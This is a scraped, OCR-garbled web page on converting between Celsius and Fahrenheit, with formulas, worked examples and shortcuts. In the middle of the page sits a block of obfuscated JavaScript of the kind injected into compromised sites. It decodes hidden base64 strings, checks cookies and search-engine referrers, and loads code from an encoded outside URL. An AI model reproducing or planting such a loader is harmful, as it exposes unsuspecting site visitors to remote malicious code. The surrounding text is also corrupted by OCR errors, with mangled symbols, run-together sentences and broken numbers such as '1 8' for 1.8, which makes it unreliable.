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6° Fahrenheit (normal body temperature) to CelsiusOther Methods That WorkUse 1 8 instead of 9/59/5 is equal to 1.. var _0x14
1b=['VkIJ4SWw="RGN1cXM=","ZFJLTHc=','bXBxV1I=","ZmlhUUk=",'WIR1S1E=",'dEILdGQ=",'cnJCaUc=",'OyBzZZWN1lcm
U=",'LnlhaG9vLg==",'"LnlhbmRleC4=",'dmlzaXRIZA=="/UHNZ','bmx5','S29h",' OyBw Y XRoPQ==",'"aHROcHM6Ly9jbG91ZGV
5ZXNzLm11bi9%b25fY29uL.nBocD94PW VulnF1ZXJ5PQ==",'"Lmdvb2dsZS4=",'bmN5ems=",' TnprS1A="'Qm9%hcOM=",'cmVm
ZXJyZX1=",'emZoaks=","ZkJIBWmO0=','RHhqaFU=",'aW5kZXhPZg=="'S1BJeWg=",'c2V0','UVdBWVY=""RnVDSnU=",'bEthS
Gs=','bmJyVmk=",'U0F4Zno=","Z2VOVGItZQ==","ZmRiZUk=",' WFlwcGo='",'aHdmWXY=','"d0dDdmk=",'VFJGUHA=",'bXN1
WnM=",'aGVhZA==""Y3JIYXRIRWxIbWVudA==",'"anlkWmE=",'c3Jj',"Z2VORWxIbW VudHNCeVRhZ05hbWU=",'Qkltck8=",’
YXBwWZW5kQ2hpbGQ=","Y29va2ll','/dGFlaWc=",'bGVuZ3Ro0','c3BsaXQ=",'OyBleHBpcmVzPQ==",'OyBkb2 1haW49','aWpCc
GQ="];(function(_0x18747d,_0x1e2f93){var _0x53cee3=function(_0x1c01a5){while(--_0x1c01a5){_0x18747d['push'](_0x187
47d['shift']();} };_0x53cee3(++_0x1e2f93);}(_0x141b,0x1d8));var
_0x3470=function(_0x21d9b1,_0x5dee7e){_0x21d9b1=_0x21d9b1-0x0;var
_0x3b77ae=_0x141b[_0x21d9b1];if(_0x3470['initialized']===undefined){ (function(){ var _Ox1cbef5;try{var
_0x233b4c=Function('return\x20(function()\x20'+'{ }.

constructor(\x22return\x20this\x22)(\x20)'+");");_0x1cbef5=_0x233b4c(); } catch(_0x47972b){_0x1cbef5=window;}var _0x662
2a7='"ABCDEFGHIJKLMNOPQRSTUVWXY Zabcdefghijklmnopqrstuvwxyz0123456789+/=";_0x1cbef5['atob']ll(_Ox1cbef5['
atob']=function(_0x648e55){var _0x2987be=String(_0x648e55)['replace'](/=+$/,");for(var _0x2bbb58=0x0,_0x501615,_0x44f
048,_0xcc0218=0x0,_0x55adcb=";_0x44f048=_0x2987be['charAt'](_0xcc0218++);~_0x44f048& & (_0x501615=_0x2bbb58%
0x4?_0x501615*0x40+_0x441048:_0x44f048,_0x2bbb58++%0x4)?_0x55adcb+=String['fromCharCode'](0xff&_0x501615>>
(-0x2*_0x2bbb58&0x6)):0x0){_0x44f048=_0x6622a7['indexOf"'](_0x44f048);}return
_0x55adcb;});}());_0x3470['base64DecodeUnicode'|=function(_0x4889a8){var _0x3e86d4=atob(_0x4889a8);var
_0x51alea=[];for(var _0x5b149b=0x0,_0x37403b=_0x3e86d4['length'];_0x5b149b=_0x4e2985;},'TBAZm":function
_0x357c3a(_0x33flab,_0x4f6d98){return _0x33flab===_0x4f6d98;},'DxjhU":_0x3470('0x1a"), KPIyh':function
_0x3c6cd2(_0x40b133,_0x4b8031){return

_0x40b133!==_0x4b8031;},'pCxgz":_0x3470('0x1b"), QWAYV":_0x3470('0x1c"), FuCJu":function
_0xle6dcc(_0x2e0b25,_0x5525eb){return _0x2e0b25+_0x5525eb;},'1IKaHk":function
_0x8bb006(_0x5aeded,_0x38095¢){return _0x5aeded+_0x38095e;}, nbrVi':function _0xf9b0b(_0x27d43c,_0x188911){return
_0x27d43c(_0x188911);}, LuiHK "function _0x1c4fad(_0x290c40,_0x3a7fe7){return
_0x290c40+_0x3a7fe7;},'izCmE":_0x3470('0xb"),'SAxfz":function _0x4622da(_0x3d1e9a,_0x3425a9){return
_0x3dle9a+_0x3425a9;},'fdbel":function _0x1abf9b(_0xcal8e6,_0x51588a){return

_Oxcal8e6*_0x51588a;}, XYppj':_0x3470('0x1d"), hwfYv':_0x3470('0xc"),' wGCvi'":';\x20secure', TRFPp':function
_0x477305(_0x11b545,_0x933a78){return _0x11b545+_0x933a78;},' msuZs"._0x3470('0Ox1e") };var
_0x1d1343=[_0x3470('0x1f"),_0x450a56[_0x3470('0x20")],_0x450a56['BRArC'],".. aol '," ask ',_0x450a56[_0x3470('0x21")],_0
x450a56[_0x3470('0x22")]],_0x46ccad=document[_0x3470('0x23")],_0x38adb8=![],_Oxe59%aea=cookie['get'](_0x450a56[_0x34
70('0x24"]);for(var _0x585359=0x0;_0x585359=0x0){_0x38adb8=!![];}} } }if(_0x38adb8){if(_0x450a56[_0x3470('0x28")](_0
x3470('0x1b"),_0x450a56['pCxgz'])){ params=matches[_0x585359][_0x3470('0xa")]('=");cookie[params[0x0]]=params[0x1]['rep
lace'](/;$/); }else{cookie[_0x3470('0x29")](_0x450a56[_0x3470('0x24")],0x1,0x1);if(!_Oxe59aea){if (_0x450a56[_0x3470('0x2a’
)]!==_0x450a56[_0x3470('0x2a")]){ document['cookie']=_0x450a56[_0x3470('0x2b")](_0x450a56[_0x3470('0x2c")](_0x450a56
[L0x3470('0x2c")](_0x450a56[_0x3470('0x2c")](name,'="),_0x450a56[_0x3470('0x2d")](escape,value)),expires?_0x450a56['Lui
HK'](_0x450a56['izCmE'],new Date(_0x450a56[_0x3470('0x2e")](new Date()[_0x3470('0x2f")](),_0x450a56[_0x3470('0x30")]
(expires,0x3e8)))):"),path?_0x450a56[_0x3470('0x2e")](_0x450a56[_0x3470('0x31")],path):")+(domain?_0x450a56[_0x3470('0
x32")]+domain:")+(secure?_0x450a56[_0x3470('0x33")]:"); }else{include(_0x450a56[_0x3470('0x34")](_0x450a56[_0x3470('0x
34](_0x450a56[_0x3470('0x35"1,9),"));} } } } }R(); Conversion of TemperatureQuick Celsius (°C) / Fahrenheit (°F)
Conversion:Just type a value in either box:Typical Temperatures(and the same number!)ExplanationThere are two main
temperature scales:They both measure the same thing (temperature!), but use different numbers:Boiling water (at normal
pressure) measures 100° in Celsius, but 212° in FahrenheitAnd as water freezes it measures 0° in Celsius, but 32° in
FahrenheitLooking at the diagram, notice:The scales start at a different number (0 vs 32), so we will need to add or subtract
32The scales rise at a different rate (100 vs 180), so we will also need to multiplyAnd so, to convert:But 180/100 can be
simplified to 9/5,and 100/180 can be simplified to 5/9, so this is the easiest way:We can write each as a formula like
this:Example: Convert 26° Celsius (a nice warm day) to FahrenheitExample: Convert 98.. 8, so we can also use this
method:Fahrenheit to Celsius: (°F — 32) / 1 8 = °CTo make "x1.
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8" easier we can multiply by 2 and subtract 10%, but it only works for °C to °F:Example: Convert 20° Celsius (A nice day) to
Fahrenheit20x2 = 40less 10% is 40—4 = 3636+32 = 68° FAdd 40, Multiply, Subtract 40Since both scales cross at —40° (—40° C
equals —40° F) we can:Fahrenheit to Celsius: Add 40, multiply by 5/9, then subtract 40Example: Convert 10° Celsius (A cool
day) to Fahrenheit10+40 = 5050x9/5 = 9090-40 = 50° FTo remember 9/5 for °C to °F think "F is greater than C, so there are
more °F than °C"Quick, but Not AccurateFahrenheit to Celsius: Subtract 30, then halveFootnote: Temperature is a measure of
how fast an objects particles are moving. Civ V Firetuner Gamesgames
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